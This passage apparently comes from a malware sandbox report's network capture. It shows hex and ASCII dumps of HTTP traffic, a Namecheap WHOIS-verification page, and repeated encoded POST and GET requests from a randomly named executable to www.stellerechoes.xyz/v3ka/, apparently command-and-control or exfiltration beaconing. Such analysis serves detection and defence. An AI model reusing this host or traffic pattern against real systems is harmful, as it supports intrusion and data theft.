                                                                                    Data Raw: 31 65 38 39 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 61 6e 74 20 57 48 4f 49 53 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 7c 20 4e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6e 63 2d 69 63 6f 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6e 63 5f 6d 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 6e 29 7b 69 66 28 72 5b 6e 5d 29 72 65 74 75 72 6e 20 72 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 72 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 74 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 65 2c 74 2e 63 3d 72 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 74 2e 6f 28 65 2c 72 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 72 2c 22 61 22 2c 72 29 2c 72 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 32 37 30 29 7d 28 7b 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 33 29 2c 69 3d 72 28 31 35 29 2c 6f
                                                                                    Data Ascii: 1e89<html><head lang="en"><meta charset="UTF-8"/><title>Registrant WHOIS contact information verification | Namecheap.com</title><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="shortcut icon" href="https://www.namecheap.com/assets/img/nc-icon/favicon.ico"/><script type="text/javascript">var nc_main=function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=270)}({0:function(e,t,r){var n=r(3),i=r(15),o
                                                                                    Mar 18, 2024 15:09:07.638947010 CET1286INData Raw: 3d 72 28 31 30 29 2c 75 3d 72 28 31 31 29 2c 61 3d 72 28 31 36 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 63 2c 66 2c 70 2c 6c 2c 68 3d 65 26 73 2e 46 2c 64 3d 65 26 73 2e 47 2c 76 3d 65 26 73 2e 53 2c 6d 3d 65 26 73
                                                                                    Data Ascii: =r(10),u=r(11),a=r(16),s=function(e,t,r){var c,f,p,l,h=e&s.F,d=e&s.G,v=e&s.S,m=e&s.P,y=e&s.B,g=d?n:v?n[t]||(n[t]={}):(n[t]||{}).prototype,b=d?i:i[t]||(i[t]={}),x=b.prototype||(b.prototype={});d&&(r=t);for(c in r)f=!h&&g&&void 0!==g[c],p=(f?g:r
                                                                                    Mar 18, 2024 15:09:07.639044046 CET1286INData Raw: 69 6e 67 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 26 26 74 68 69 73 5b 75 5d 7c 7c 61 2e 63 61 6c 6c 28 74 68 69 73 29 7d 29 7d 2c 31 31 30 3a 66 75 6e 63 74 69
                                                                                    Data Ascii: ing",function(){return"function"==typeof this&&this[u]||a.call(this)})},110:function(e,t,r){r(111),r(112),r(113),e.exports=r(15).Array},111:function(e,t,r){"use strict";var n=r(0),i=r(43)(!0);n(n.P,"Array",{includes:function(e){return i(this,e
                                                                                    Mar 18, 2024 15:09:07.639101982 CET1286INData Raw: 4c 49 45 44 0a 57 41 52 52 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 54 49 54 4c 45 2c 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 2c 0a 4d 45 52 43 48 41 4e 54
                                                                                    Data Ascii: LIEDWARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,MERCHANTABLITY OR NON-INFRINGEMENT.See the Apache Version 2.0 License for specific language governing permissionsand limitations under the License.******************
                                                                                    Mar 18, 2024 15:09:07.639156103 CET1286INData Raw: 72 3b 6b 28 72 29 7c 7c 28 72 3d 41 28 72 29 29 3b 76 61 72 20 6e 3d 76 28 74 2c 72 2c 21 31 29 3b 69 66 28 6b 28 6e 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 21 6e 2e 64 65 6c 65 74 65 28 65 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6e 2e 73 69
                                                                                    Data Ascii: r;k(r)||(r=A(r));var n=v(t,r,!1);if(k(n))return!1;if(!n.delete(e))return!1;if(n.size>0)return!0;var i=ee.get(t);return i.delete(r),i.size>0||(ee.delete(t),!0)}function h(e,t){for(var r=e.length-1;r>=0;--r){var n=e[r],i=n(t);if(!k(i)&&!q(i)){if
                                                                                    Mar 18, 2024 15:09:07.639209032 CET1286INData Raw: 68 3d 75 2c 72 3b 76 61 72 20 73 3d 55 28 61 29 3b 74 72 79 7b 72 5b 75 5d 3d 73 7d 63 61 74 63 68 28 65 29 7b 74 72 79 7b 49 28 6f 29 7d 66 69 6e 61 6c 6c 79 7b 74 68 72 6f 77 20 65 7d 7d 75 2b 2b 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b
                                                                                    Data Ascii: h=u,r;var s=U(a);try{r[u]=s}catch(e){try{I(o)}finally{throw e}}u++}}function E(e){if(null===e)return 1;switch(typeof e){case"undefined":return 0;case"boolean":return 2;case"string":return 3;case"symbol":return 4;case"number":return 5;case"obje
                                                                                    Mar 18, 2024 15:09:07.639261007 CET1286INData Raw: 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 73 77 69 74 63 68 28 45 28 65 29 29 7b 63 61 73 65 20 33 3a 63 61 73 65 20 34 3a 72 65 74 75 72 6e 21 30 3b 64 65
                                                                                    Data Ascii: e){return"function"==typeof e}function D(e){switch(E(e)){case 3:case 4:return!0;default:return!1}}function L(e,t){var r=e[t];if(void 0!==r&&null!==r){if(!C(r))throw new TypeError;return r}}function F(e){var t=L(e,V);if(!C(t))throw new TypeErro
                                                                                    Mar 18, 2024 15:09:07.639314890 CET1286INData Raw: 7c 28 57 3d 7b 7d 29 29 3b 76 61 72 20 59 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 46 75 6e 63 74 69 6f 6e 29 2c 4a 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 65 6e 76 26 26 22 74 72 75 65 22
                                                                                    Data Ascii: |(W={}));var Y=Object.getPrototypeOf(Function),J="object"==typeof e&&e.env&&"true"===e.env.REFLECT_METADATA_USE_MAP_POLYFILL,H=J||"function"!=typeof Map||"function"!=typeof Map.prototype.entries?function(){function e(e,t){return e}function t(e
                                                                                    Mar 18, 2024 15:09:07.639369011 CET1286INData Raw: 2e 5f 66 69 6e 64 28 65 2c 21 31 29 3b 72 65 74 75 72 6e 20 74 3e 3d 30 3f 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 74 5d 3a 76 6f 69 64 20 30 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                    Data Ascii: ._find(e,!1);return t>=0?this._values[t]:void 0},i.prototype.set=function(e,t){var r=this._find(e,!0);return this._values[r]=t,this},i.prototype.delete=function(e){var t=this._find(e,!1);if(t>=0){for(var r=this._keys.length,i=t+1;i<r;i++)this.
                                                                                    Mar 18, 2024 15:09:07.639419079 CET783INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 61 70 2e 73 69 7a 65 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75
                                                                                    Data Ascii: nction(){return this._map.size},enumerable:!0,configurable:!0}),e.prototype.has=function(e){return this._map.has(e)},e.prototype.add=function(e){return this._map.set(e,e),this},e.prototype.delete=function(e){return this._map.delete(e)},e.proto
                                                                                    Mar 18, 2024 15:09:07.823303938 CET1286INData Raw: 32 30 30 30 0d 0a 65 74 75 72 6e 20 65 5b 61 5d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 3b 2b 2b 72 29 65 5b 72 5d 3d 32 35 35 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 3b 72 65 74 75
                                                                                    Data Ascii: 2000eturn e[a]}function r(e,t){for(var r=0;r<t;++r)e[r]=255*Math.random()|0;return e}function n(e){return"function"==typeof Uint8Array?"undefined"!=typeof crypto?crypto.getRandomValues(new Uint8Array(e)):"undefined"!=typeof msCrypto?msCrypto


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.3049820198.177.123.106806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:13.346460104 CET739OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 52 6c 72 6f 42 73 59 62 31 30 52 64 39 5a 63 75 43 2f 56 4f 37 2f 33 4f 32 31 6e 44 55 48 37 36 79 46 6f 4c 6b 72 76 62 33 76 31 62 50 42 4c 52 48 44 74 6f 2f 74 45 53 2b 2b 6c 78 36 58 64 68 67 62 4c 59 36 6c 59 59 32 39 74 39 58 6e 36 6a 72 51 4d 66 53 53 5a 33 41 73 75 47 6a 36 77 37 72 79 72 67 43 54 73 7a 4d 54 38 79 5a 57 45 78 73 61 36 4d 45 73 34 4d 58 62 43 70 6b 58 55 75 56 49 72 75 4f 4e 64 4a 61 45 6f 4a 46 4b 6f 30 42 41 47 4c 59 4c 77 34 37 42 4f 41 35 55 64 34 70 5a 42 72 6f 7a 6e 4c 38 62 33 70 53 4b 2f 52 6f 51 65 6b 51 3d 3d
                                                                                    Data Ascii: c4qx7JIP=LH3rHLbXIwT+CRlroBsYb10Rd9ZcuC/VO7/3O21nDUH76yFoLkrvb3v1bPBLRHDto/tES++lx6XdhgbLY6lYY29t9Xn6jrQMfSSZ3AsuGj6w7ryrgCTszMT8yZWExsa6MEs4MXbCpkXUuVIruONdJaEoJFKo0BAGLYLw47BOA5Ud4pZBroznL8b3pSK/RoQekQ==
                                                                                    Mar 18, 2024 15:09:13.632683039 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:13 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.11.3049821198.177.123.106806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:16.037503004 CET759OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 58 37 37 58 68 6f 4b 6d 44 76 61 33 76 31 44 2f 42 4b 66 6e 44 32 6f 2f 52 36 53 2f 43 6c 78 36 7a 64 68 67 4c 4c 59 4e 52 62 59 6d 39 6a 37 58 6e 38 6e 72 51 4d 66 53 53 5a 33 45 4d 49 47 6a 69 77 37 62 43 72 68 6d 48 74 2b 73 54 2f 31 5a 57 45 31 73 61 6d 4d 45 73 61 4d 57 48 73 70 6d 2f 55 75 51 4d 72 75 62 35 61 51 4b 46 43 45 6c 4c 37 35 7a 6b 50 44 37 66 6d 78 35 6c 46 41 73 63 37 77 65 6f 62 32 72 48 6c 59 63 6e 61 31 54 6e 58 54 71 52 46 35 54 46 62 6f 73 76 57 47 57 33 43 59 61 31 41 41 64 44 37 6c 44 30 3d
                                                                                    Data Ascii: c4qx7JIP=LH3rHLbXIwT+Cy9rqiEYT10SDtZcni/ZO7z3O3wgDhX77XhoKmDva3v1D/BKfnD2o/R6S/Clx6zdhgLLYNRbYm9j7Xn8nrQMfSSZ3EMIGjiw7bCrhmHt+sT/1ZWE1samMEsaMWHspm/UuQMrub5aQKFCElL75zkPD7fmx5lFAsc7weob2rHlYcna1TnXTqRF5TFbosvWGW3CYa1AAdD7lD0=
                                                                                    Mar 18, 2024 15:09:16.326740980 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:16 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.11.3049822198.177.123.106806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:18.750458956 CET1676OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 66 37 36 6b 5a 6f 49 41 4c 76 4c 48 76 31 64 50 42 50 66 6e 44 33 6f 2f 35 6d 53 2f 4f 66 78 34 37 64 7a 57 48 4c 65 2f 35 62 58 6d 39 6a 35 58 6e 35 6a 72 51 56 66 52 36 56 33 41 67 49 47 6a 69 77 37 59 61 72 6d 79 54 74 38 73 54 38 79 5a 57 41 78 73 61 43 4d 45 55 67 4d 57 44 53 70 57 66 55 76 77 38 72 76 70 52 61 50 61 46 41 4b 46 4b 38 35 7a 5a 58 44 37 54 41 78 34 67 53 41 72 51 37 31 76 42 2f 74 34 79 36 47 4d 6a 69 38 51 61 68 5a 38 46 77 6d 42 49 36 6b 65 37 51 50 43 6e 34 61 65 67 66 51 63 6a 6b 39 6e 53 74 5a 31 6b 35 77 6c 4a 59 50 4b 42 41 67 32 67 4c 65 49 31 49 72 71 54 51 7a 2b 32 79 4c 44 2b 65 47 51 5a 6e 38 35 37 43 43 6a 68 70 76 57 32 76 75 42 6b 70 4d 50 49 44 58 58 50 56 32 4c 4d 4f 31 5a 65 4a 45 4d 33 71 4d 39 4c 68 64 77 43 62 61 46 39 49 31 31 4d 35 64 72 31 50 43 41 77 4d 41 47 76 31 62 69 32 76 48 72 35 76 4e 37 32 66 39 61 6a 53 4f 34 73 4d 77 35 4f 55 4d 53 58 78 41 70 4b 6e 55 71 33 66 38 71 48 34 79 68 4a 4f 7a 6b 48 54 4d 2f 74 4c 45 6d 6d 72 57 6c 44 6e 57 74 50 6d 4d 42 57 70 35 6e 48 6c 6e 6c 57 69 31 57 76 41 53 64 45 75 4e 45 55 6a 34 6e 38 39 75 57 4a 2b 30 47 4e 50 4e 48 49 47 4e 70 67 65 58 4c 59 4f 65 69 54 32 4f 4e 4f 33 6d 47 34 72 37 56 6d 53 47 4f 45 37 57 51 30 34 43 39 46 7a 35 30 53 68 56 37 58 53 33 70 4a 37 2b 2f 32 76 51 58 45 36 45 76 6f 66 74 63 73 7a 44 35 4e 34 6d 6e 7a 4e 2b 46 4d 6a 54 54 50 30 72 38 6f 4d 4b 59 58 35 48 48 75 69 46 51 76 59 70 45 56 31 42 50 76 33 76 4c 57 56 69 46 70 33 79 6f 31 63 64 74 4d 53 7a 53 48 72 6a 67 7a 58 4e 72 4f 55 6c 6e 4c 37 6b 7a 79 73 46 4e 61 48 2f 39 33 4a 69 5a 58 38 43 68 54 57 52 43 54 69 65 45 57 77 32 4b 38 62 6a 79 62 75 2f 6c 4e 6c 6a 39 43 58 70 6d 45 76 76 4d 47 49 78 39 4f 57 4f 37 53 30 7a 7a 58 50 68 77 57 32 52 7a 4f 35 2b 73 79 4a 37 67 35 54 36 52 54 6c 7a 47 64 32 4f 34 6c 6c 63 56 42 4c 4c 75 4f 50 63 31 6d 76 30 71 65 77 33 54 41 55 37 32 5a 35 66 74 59 6d 4c 74 49 34 4f 72 4a 51 2f 31 31 6d 69 2f 67 52 69 65 7a 65 41 50 4b 2f 49 34 31 6e 4a 37 77 51 46 4d 75 50 6a 55 48 6f 5a 6f 68 42 35 64 2b 72 59 4e 45 6e 44 6b 66 6d 50 76 4a 6b 5a 7a 33 57 73 73 59 50 71 58 36 74 65 4b 76 38 58 5a 62 71 38 66 68 76 34 6b 38 6e 32 4a 37 75 38 4d 31 34 71 50 78 2f 79 37 61 61 65 51 75 68 4c 77 55 48 46 35 6a 64 78 5a 45 32 65 51 49 37 74 66 59 61 68 56 7a 37 6c 2b 2f 36 47 76 54 38 58 71 79 44 45 52 7a 4e 77 4a 34 6f 37 41 69 32 4f 4c 6d 37 6e 50 35 53 68 6d 52 53 2b 6d 65 34 42 2f 75 72 78 4f 76 79 70 30 2f 49 37 61 7a 73 45 70 65 61 4d 71 6f 52 58 55 58 43 77 4d 53 68 75 36 2b 79 48 72 68 42 68 6a 70 54 45 66 77 46 65 4f 31 38 52 31 44 65 48 44 30 39 37 48 57 46 33 67 6f 37 48 65 69 58 63 31 70 66 42 50 50 38 6a 49 47 50 56 6e 46 47 42 58 34 65 59 69 56 4c 70 79 34 59 4f 4f 61 46 4e 44 46 76 31 74 38 67 49 64 49 73 51 6f 31 78 70 55 31 51 79 57 48 49 43 69 76 5a 49 71 5a 31 47 44 39 34 58 45 67 57 6e 2b 44 39 36 4d 6a 74 57 36 79 59 6d 78 39 69 6f 62 65 64 45 4f 55 39 73 68 45 58 6d 69 33 33 63 7a 6c 71 68 73 31 79 51 65 74 4d 61 2f 67 75 71 73 39 6d 55 58 64 6a 72 37 51 33 72 6a 78 2b 68 48 63 59 62 6c 4b 74 2f 46 4a 42 59 74 5a 4c 65 37 77 34 35 30 64 71 2f 64 61 43 4b 44 67 53 41 65 47 52 52 72 4c 78 59 4f 74 4e 4b 4b 35 64 67 63 51 75 70 79 72 4a 76 6d 6a 42 71 31 30 51 33 50 70 70 39 6d 46 71 44 58 31 56
                                                                                    Data Ascii: c4qx7JIP=LH3rHLbXIwT+Cy9rqiEYT10SDtZcni/ZO7z3O3wgDhf76kZoIALvLHv1dPBPfnD3o/5mS/Ofx47dzWHLe/5bXm9j5Xn5jrQVfR6V3AgIGjiw7YarmyTt8sT8yZWAxsaCMEUgMWDSpWfUvw8rvpRaPaFAKFK85zZXD7TAx4gSArQ71vB/t4y6GMji8QahZ8FwmBI6ke7QPCn4aegfQcjk9nStZ1k5wlJYPKBAg2gLeI1IrqTQz+2yLD+eGQZn857CCjhpvW2vuBkpMPIDXXPV2LMO1ZeJEM3qM9LhdwCbaF9I11M5dr1PCAwMAGv1bi2vHr5vN72f9ajSO4sMw5OUMSXxApKnUq3f8qH4yhJOzkHTM/tLEmmrWlDnWtPmMBWp5nHlnlWi1WvASdEuNEUj4n89uWJ+0GNPNHIGNpgeXLYOeiT2ONO3mG4r7VmSGOE7WQ04C9Fz50ShV7XS3pJ7+/2vQXE6EvoftcszD5N4mnzN+FMjTTP0r8oMKYX5HHuiFQvYpEV1BPv3vLWViFp3yo1cdtMSzSHrjgzXNrOUlnL7kzysFNaH/93JiZX8ChTWRCTieEWw2K8bjybu/lNlj9CXpmEvvMGIx9OWO7S0zzXPhwW2RzO5+syJ7g5T6RTlzGd2O4llcVBLLuOPc1mv0qew3TAU72Z5ftYmLtI4OrJQ/11mi/gRiezeAPK/I41nJ7wQFMuPjUHoZohB5d+rYNEnDkfmPvJkZz3WssYPqX6teKv8XZbq8fhv4k8n2J7u8M14qPx/y7aaeQuhLwUHF5jdxZE2eQI7tfYahVz7l+/6GvT8XqyDERzNwJ4o7Ai2OLm7nP5ShmRS+me4B/urxOvyp0/I7azsEpeaMqoRXUXCwMShu6+yHrhBhjpTEfwFeO18R1DeHD097HWF3go7HeiXc1pfBPP8jIGPVnFGBX4eYiVLpy4YOOaFNDFv1t8gIdIsQo1xpU1QyWHICivZIqZ1GD94XEgWn+D96MjtW6yYmx9iobedEOU9shEXmi33czlqhs1yQetMa/guqs9mUXdjr7Q3rjx+hHcYblKt/FJBYtZLe7w450dq/daCKDgSAeGRRrLxYOtNKK5dgcQupyrJvmjBq10Q3Ppp9mFqDX1V
                                                                                    Mar 18, 2024 15:09:19.049846888 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.11.3049823198.177.123.106806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:21.447671890 CET463OUTGET /v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:21.735922098 CET548INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 14:09:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 